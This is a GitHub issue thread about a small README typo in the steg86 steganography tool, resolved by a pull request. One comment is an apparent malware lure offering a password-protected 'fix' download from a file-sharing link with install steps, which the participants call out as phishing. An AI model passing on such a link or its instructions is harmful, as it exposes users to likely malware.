### ISSUE TITLE
Simple error in Readme

### ISSUE THREAD

**Issue by verisimilidude2** [woodruffw/steg86#266]
In the Readme the example of extraction given is
```
$ steg86 extract bash.steg > my_message
$ cat message
here is my secret message
```
with the extraction into a file named "my_message" but the result being read from a file named "message".
Change `cat message` to `cat my_message`

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by woodruffw** [comment]
> with the extraction into a file named "my_message" but the result being read from a file named "message".
> Change `cat message` to `cat my_message`

Please send a fix PR, thanks.

> This looks like phishing. No way would I click on that link. Your "fix" instructions make no sense.

What?

**Comment by verisimilidude2** [comment]
I'll send the PR.  
Someone from the Ivory Coast sent a message (now deleted) saying they had a "fix" for my "problem" and I should download a file from a filesharing site and run it with `gcc`.  Since they deleted their message I have now deleted my response to them.

**Comment by woodruffw** [comment]
https://github.com/woodruffw/steg86/pull/268
